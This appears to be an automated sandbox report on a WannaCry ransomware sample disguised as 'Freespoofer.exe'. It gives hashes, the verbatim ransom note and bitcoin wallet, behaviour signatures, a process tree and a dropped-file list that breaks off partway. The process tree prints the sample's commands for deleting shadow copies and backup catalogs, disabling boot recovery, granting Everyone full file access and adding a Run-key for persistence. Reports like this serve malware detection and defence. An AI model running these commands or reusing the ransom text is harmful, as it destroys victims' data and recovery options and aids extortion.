Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-06-2024 17:02

General

  • Target

    Freespoofer.exe

  • Size

    3.4MB

  • MD5

    84c82835a5d21bbcf75a61706d8ab549

  • SHA1

    5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

  • SHA256

    ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

  • SHA512

    90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

  • SSDEEP

    98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Freespoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\Freespoofer.exe"
    1⤵
    • Drops startup file
    • Sets desktop wallpaper using registry
    • Suspicious use of WriteProcessMemory
    PID:4720
    • C:\Windows\SysWOW64\attrib.exe
      attrib +h .
      2⤵
      • Views/modifies file attributes
      PID:2648
    • C:\Windows\SysWOW64\icacls.exe
      icacls . /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:3192
    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
      taskdl.exe
      2⤵
      • Executes dropped EXE
      PID:1112
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 132251717693383.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3240
      • C:\Windows\SysWOW64\cscript.exe
        cscript.exe //nologo m.vbs
        3⤵
          PID:516
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h +s F:\$RECYCLE
        2⤵
        • Views/modifies file attributes
        PID:852
      • C:\Users\Admin\AppData\Local\Temp\@[email protected]
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1196
        • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
          TaskData\Tor\taskhsvc.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          PID:1612
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c start /b @[email protected] vs
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2568
        • C:\Users\Admin\AppData\Local\Temp\@[email protected]
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3456
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3284
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic shadowcopy delete
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:5008
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:4600
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1752
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lzhzgnzvtqqc290" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1256
        • C:\Windows\SysWOW64\reg.exe
          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "lzhzgnzvtqqc290" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
          3⤵
          • Adds Run key to start application
          • Modifies registry key
          PID:4436
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:3732
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4052
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:2076
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3212
      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
        taskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4476
      • C:\Users\Admin\AppData\Local\Temp\@[email protected]
        2⤵
        • Executes dropped EXE
        • Sets desktop wallpaper using registry
        • Suspicious use of SetWindowsHookEx
        PID:4548
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        2⤵
        • Executes dropped EXE
        PID:4380
    • C:\Users\Admin\Desktop\@[email protected]
      "C:\Users\Admin\Desktop\@[email protected]"
      1⤵
      • Executes dropped EXE
      • Sets desktop wallpaper using registry
      • Suspicious use of SetWindowsHookEx
      PID:4168
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4844
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4524
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        2⤵
        • Checks processor information in registry
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:3136
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.0.2012349115\805621707" -parentBuildID 20230214051806 -prefsHandle 2168 -prefMapHandle 2160 -prefsLen 19854 -prefMapSize 233483 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6568b856-9162-4251-9de2-1f4baad5cca1} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 2240 2138edf4f58 gpu
          3⤵
            PID:4068
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.1.1986764292\2124537079" -parentBuildID 20230214051806 -prefsHandle 2572 -prefMapHandle 2568 -prefsLen 19854 -prefMapSize 233483 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e54ef44-acb1-4580-abb5-d3a10b557a4f} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 2584 21382f89f58 socket
            3⤵
              PID:3700
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.2.257079308\1119512623" -childID 1 -isForBrowser -prefsHandle 3548 -prefMapHandle 3544 -prefsLen 20571 -prefMapSize 233483 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a21907f2-56fb-4d84-8bf9-57b65677c0d5} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 3560 2139335f258 tab
              3⤵
                PID:4604
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.3.614204193\1900968851" -childID 2 -isForBrowser -prefsHandle 4208 -prefMapHandle 4204 -prefsLen 20758 -prefMapSize 233483 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0eb1779-f076-4546-a77b-2b0b7d971c05} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 4092 2138ed8e758 tab
                3⤵
                  PID:4856
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.4.1389475853\1881076727" -childID 3 -isForBrowser -prefsHandle 4440 -prefMapHandle 4196 -prefsLen 27380 -prefMapSize 233483 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {acb459d4-59a7-43d3-8d32-27e0a87e09a3} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 4452 21395650c58 tab
                  3⤵
                    PID:4776
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.5.381846885\1486937017" -parentBuildID 20230214051806 -prefsHandle 5128 -prefMapHandle 5124 -prefsLen 28086 -prefMapSize 233483 -appDir "C:\Program Files\Mozilla Firefox\browser" - {423ebaa5-9d68-4e5e-bcef-d1c30b65d656} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 5140 2139593d358 rdd
                    3⤵
                      PID:748
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.6.373983004\410036008" -childID 4 -isForBrowser -prefsHandle 2508 -prefMapHandle 3716 -prefsLen 28904 -prefMapSize 233483 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ccf8b0c-d9f2-4350-b4b8-c7dce466d014} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 1660 2138edf4658 tab
                      3⤵
                        PID:1844
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.7.28088785\898591788" -childID 5 -isForBrowser -prefsHandle 2508 -prefMapHandle 1748 -prefsLen 28904 -prefMapSize 233483 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e88784f2-a0d7-437c-8af3-7050bb0d623d} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 5608 21390b46f58 tab
                        3⤵
                          PID:4072
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.8.629449638\37398171" -childID 6 -isForBrowser -prefsHandle 5688 -prefMapHandle 5692 -prefsLen 28904 -prefMapSize 233483 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {62a09381-390d-4b4e-9fe0-c99148c2b8ed} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 5680 2139335ec58 tab
                          3⤵
                            PID:3564
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.9.2103551441\2059698059" -childID 7 -isForBrowser -prefsHandle 6132 -prefMapHandle 6128 -prefsLen 28904 -prefMapSize 233483 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {168b3fc0-9c74-457e-bc32-bdfa5626db65} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 6076 21399487858 tab
                            3⤵
                              PID:3960
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3136.10.2100151666\1792530759" -childID 8 -isForBrowser -prefsHandle 1616 -prefMapHandle 5440 -prefsLen 29234 -prefMapSize 233483 -jsInitHandle 1332 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38ef9735-e010-4617-b1ae-631212d6e637} 3136 "\\.\pipe\gecko-crash-server-pipe.3136" 5428 2138fd83558 tab
                              3⤵
                                PID:4496
                          • C:\Windows\system32\taskmgr.exe
                            "C:\Windows\system32\taskmgr.exe" /0
                            1⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:1216

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json

                            Filesize

                            102B

                            MD5

                            7d1d7e1db5d8d862de24415d9ec9aca4

                            SHA1

                            f4cdc5511c299005e775dc602e611b9c67a97c78

                            SHA256

                            ffad3b0fb11fc38ea243bf3f73e27a6034860709b39bf251ef3eca53d4c3afda

                            SHA512

                            1688c6725a3607c7b80dfcd6a8bea787f31c21e3368b31cb84635b727675f426b969899a378bd960bd3f27866023163b5460e7c681ae1fcb62f7829b03456477

                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\h6dhg2l4.default-release\activity-stream.discovery_stream.json.tmp

                            Filesize

                            23KB

                            MD5

                            9ec7b7ad590e432f75870b4a1cb41f37

                            SHA1

                            8673bdc2a93c09b8ea52e470d37ff0ae010eb600

                            SHA256

                            c9df76585e3a002a95804abd5fdd536b6b9cb1e3bc034d5a33380169d7c45854

                            SHA512

                            c3125fea226d41f99ab103f91e7d1fd7497adcaf85ea4498155e2c65073b2b73ca85efbac996935d28191844f4ace510a444501dee31b0f26b83133b5008471d

                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\h6dhg2l4.default-release\cache2\doomed\12693

                            Filesize

                            11KB

                            MD5

                            f47d7999ba2a342d9c71cc0f5e536abc

                            SHA1

                            676cef7ccb846f5523e98fab7149b8784a069556

                            SHA256

                            ff31486ec798e44fdc2c6bbeb8166396081a8f97f1acb3785dec83d7343dfea2

                            SHA512

                            63548fc3cb62c6d2e76b6ca26a290061992a24ad72381fa27ac1c1217c3d112cfc51817ad0e3ba112cccf2c367ae14f2d22803f26853ce1b0d10d57697f61d84

                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\h6dhg2l4.default-release\cache2\doomed\13719

                            Filesize

                            11KB

                            MD5

                            607bd8788a08f080a76aa841aa393596

                            SHA1

                            fdcaddaaf12bd6c9b65c6a4d8c5e2db74d762022

                            SHA256

                            77f15348ad3b7808607987b03a4d2ec702f3d8728d3171f391556aaf251b1d20

                            SHA512

                            08655c821463dbfae98826f9372a5a025f071797d3e6c94dc6e9e234549def2c3f146bf8ab7f83e6531f41ee1cc29c86ea02aea5e2a5841615944aadf1964e4e

                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\h6dhg2l4.default-release\cache2\doomed\21993

                            Filesize

                            10KB

                            MD5

                            a4852d2cfe052aa6728e6a5f3c7c7705

                            SHA1

                            4b0136276ff091978e7474ee4365e64e2fc0c867

                            SHA256

                            1ac0e870c822f7bf3064afa849111591bed9c8489643fb2b41547b7abfd3e30c

                            SHA512

                            0dd3a046a8b8f6848806a52e2b8b3526282b8f9d812f152ed4640b52d8e59cf9952d1bcf880d4d7bc9225cd048185f47518414df64556fe4af40138dd4113d40

                          • C:\Users\Admin\AppData\Local\Temp\00000000.res

                            Filesize

                            136B

                            MD5

                            c9ac64ead4cb3deed723a96ce3c2474f

                            SHA1

                            4ac939b1b7ee89e336cd5df0faef3a9eac94fa6f

                            SHA256

                            bd720a751fff45bbdc36a91bc356c0ba654969bf5682f99a499dd7b47f9ca0fa

                            SHA512

                            080646e536c14b55b22bc0739f3f5e8b31cd0750826d8acff3702a81c92905f059fb7e8d0c11b64f935c7455b31e4360455e157a28c51bed0181fe9ab65d6cb7

                          • C:\Users\Admin\AppData\Local\Temp\132251717693383.bat

                            Filesize

                            340B

                            MD5

                            3867f2ec82a7d77c9ffefb1aac8b7903

                            SHA1

                            06fccf19b9c498b5afa2b35da00e3ab28d56f785

                            SHA256

                            4e25c23aa5babc853889d3e1e79bb01ca7650837b250314a8d50f2e2c4b6730f

                            SHA512

                            b413994e5b9f0ecb956055c7befff14845b56bb658fd8280d3213fdfa175ff76bc56e082174f2475fdf2d1f9eff618ebfd80ee2b67c091eaf1fd9c94697da5aa

                          • C:\Users\Admin\AppData\Local\Temp\@[email protected]

                            Filesize

                            933B

                            MD5

                            f97d2e6f8d820dbd3b66f21137de4f09

                            SHA1

                            596799b75b5d60aa9cd45646f68e9c0bd06df252

                            SHA256

                            0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

                            SHA512

                            efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

                          • C:\Users\Admin\AppData\Local\Temp\@[email protected]

                            Filesize

                            1KB

                            MD5

                            b2e87d4fba0dfb9d5653c40b9fe51e4b

                            SHA1

                            8c6ba5a1bb64db2a02b01c94805b96120d1b7898

                            SHA256

                            3fda2ff71f67ebbeb4da64871dc3965e42076a86a7781dd096debbc46b4fe89a

                            SHA512

                            714d2a502f2a6640919b500878cc7d2d0d219e14f2d472bb0d104414010ff5a74f9b538a9038ae71fb4eeefd6e3a8e62ce3c761415b8204660cfb3bbe4ebaff4

                          • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\SSLEAY32.dll

                            Filesize

                            694KB

                            MD5

                            a12c2040f6fddd34e7acb42f18dd6bdc

                            SHA1

                            d7db49f1a9870a4f52e1f31812938fdea89e9444

                            SHA256

                            bd70ba598316980833f78b05f7eeaef3e0f811a7c64196bf80901d155cb647c1

                            SHA512

                            fbe0970bcdfaa23af624daad9917a030d8f0b10d38d3e9c7808a9fbc02912ee9daed293dbdea87aa90dc74470bc9b89cb6f2fe002393ecda7b565307ffb7ec00

                          • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libeay32.dll

                            Filesize

                            3.0MB

                            MD5

                            6ed47014c3bb259874d673fb3eaedc85

                            SHA1

                            c9b29ba7e8a97729c46143cc59332d7a7e9c1ad8

                            SHA256

                            58be53d5012b3f45c1ca6f4897bece4773efbe1ccbf0be460061c183ee14ca19

                            SHA512

                            3bc462d21bc762f6eec3d23bb57e2baf532807ab8b46fab1fe38a841e5fde81ed446e5305a78ad0d513d85419e6ec8c4b54985da1d6b198acb793230aeecd93e

                          • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll

                            Filesize

                            702KB

                            MD5

                            90f50a285efa5dd9c7fddce786bdef25

                            SHA1

                            54213da21542e11d656bb65db724105afe8be688

                            SHA256

                            77a250e81fdaf9a075b1244a9434c30bf449012c9b647b265fa81a7b0db2513f

                            SHA512

                            746422be51031cfa44dd9a6f3569306c34bbe8abf9d2bd1df139d9c938d0cba095c0e05222fd08c8b6deaebef5d3f87569b08fb3261a2d123d983517fb9f43ae

                          • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll

                            Filesize

                            510KB

                            MD5

                            73d4823075762ee2837950726baa2af9

                            SHA1

                            ebce3532ed94ad1df43696632ab8cf8da8b9e221

                            SHA256

                            9aeccf88253d4557a90793e22414868053caaab325842c0d7acb0365e88cd53b

                            SHA512

                            8f4a65bd35ed69f331769aaf7505f76dd3c64f3fa05cf01d83431ec93a7b1331f3c818ac7008e65b6f1278d7e365ed5940c8c6b8502e77595e112f1faca558b5

                          • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll

                            Filesize

                            90KB

                            MD5

                            78581e243e2b41b17452da8d0b5b2a48

                            SHA1

                            eaefb59c31cf07e60a98af48c5348759586a61bb

                            SHA256

                            f28caebe9bc6aa5a72635acb4f0e24500494e306d8e8b2279e7930981281683f

                            SHA512

                            332098113ce3f75cb20dc6e09f0d7ba03f13f5e26512d9f3bee3042c51fbb01a5e4426c5e9a5308f7f805b084efc94c28fc9426ce73ab8dfee16ab39b3efe02a

                          • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\tor.exe

                            Filesize

                            3.0MB

                            MD5

                            fe7eb54691ad6e6af77f8a9a0b6de26d

                            SHA1

                            53912d33bec3375153b7e4e68b78d66dab62671a

                            SHA256

                            e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

                            SHA512

                            8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

                          • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll

                            Filesize

                            105KB

                            MD5

                            fb072e9f69afdb57179f59b512f828a4

                            SHA1

                            fe71b70173e46ee4e3796db9139f77dc32d2f846

                            SHA256

                            66d653397cbb2dbb397eb8421218e2c126b359a3b0decc0f31e297df099e1383

                            SHA512

                            9d157fece0dc18afe30097d9c4178ae147cc9d465a6f1d35778e1bff1efca4734dd096e95d35faea32da8d8b4560382338ba9c6c40f29047f1cc0954b27c64f8

                          • C:\Users\Admin\AppData\Local\Temp\b.wnry

                            Filesize

                            1.4MB

                            MD5

                            c17170262312f3be7027bc2ca825bf0c

                            SHA1

                            f19eceda82973239a1fdc5826bce7691e5dcb4fb

                            SHA256

                            d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

                            SHA512

                            c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

                          • C:\Users\Admin\AppData\Local\Temp\c.wnry

                            Filesize

                            780B

                            MD5

                            383a85eab6ecda319bfddd82416fc6c2

                            SHA1

                            2a9324e1d02c3e41582bf5370043d8afeb02ba6f

                            SHA256

                            079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

                            SHA512

                            c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

                          • C:\Users\Admin\AppData\Local\Temp\m.vbs

                            Filesize

                            219B

                            MD5

                            82a1fc4089755cb0b5a498ffdd52f20f

                            SHA1

                            0a8c0da8ef0354f37241e2901cf82ec9ce6474aa

                            SHA256

                            7fbdc49f4b4ba21949eca0b16c534b4882da97e94e5ca131cec1629e60439dfa

                            SHA512

                            1573a0c7333accef2695efefe1b57cba8f8d66a0061c24420ee0a183343a9a319995267d306ee85084c95580f9855bcdf9dee559b28a200b27fc3cc353315e78

                          • C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry

                            Filesize

                            46KB

                            MD5

                            95673b0f968c0f55b32204361940d184

                            SHA1

                            81e427d15a1a826b93e91c3d2fa65221c8ca9cff

                            SHA256

                            40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

                            SHA512

                            7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

                          • C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry

                            Filesize

                            53KB

                            MD5

                            0252d45ca21c8e43c9742285c48e91ad

                            SHA1

                            5c14551d2736eef3a1c1970cc492206e531703c1

                            SHA256

                            845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

                            SHA512

                            1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

                          • C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry

                            Filesize

                            77KB

                            MD5

                            2efc3690d67cd073a9406a25005f7cea

                            SHA1

                            52c07f98870eabace6ec370b7eb562751e8067e9

                            SHA256

                            5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

                            SHA512

                            0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

                          • C:\Users\Admin\AppData\Local\Temp\msg\m_croatian.wnry

                            Filesize

                            38KB

                            MD5

                            17194003fa70ce477326ce2f6deeb270

                            SHA1

                            e325988f68d327743926ea317abb9882f347fa73

                            SHA256

                            3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

                            SHA512

                            dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

                          • C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry

                            Filesize

                            39KB

                            MD5

                            537efeecdfa94cc421e58fd82a58ba9e

                            SHA1

                            3609456e16bc16ba447979f3aa69221290ec17d0

                            SHA256

                            5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

                            SHA512

                            e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

                          • C:\Users\Admin\AppData\Local\Temp\msg\m_danish.wnry

                            Filesize

                            36KB

                            MD5

                            2c5a3b81d5c4715b7bea01033367fcb5

                            SHA1

                            b548b45da8463e17199daafd34c23591f94e82cd

                            SHA256

                            a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

                            SHA512

                            490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

                          • C:\Users\Admin\AppData\Local\Temp\msg\m_dutch.wnry

                            Filesize

                            36KB

                            MD5

                            7a8d499407c6a647c03c4471a67eaad7

                            SHA1

                            d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

                            SHA256

                            2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

                            SHA512

                            608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

                          • C:\Users\Admin\AppData\Local\Temp\msg\m_english.wnry

                            Filesize

                            36KB

                            MD5

                            fe68c2dc0d2419b38f44d83f2fcf232e

                            SHA1

                            6c6e49949957215aa2f3dfb72207d249adf36283

                            SHA256

                            26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

                            SHA512

                            941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

                          • C:\Users\Admin\AppData\Local\Temp\msg\m_filipino.wnry

                            Filesize

                            36KB

                            MD5

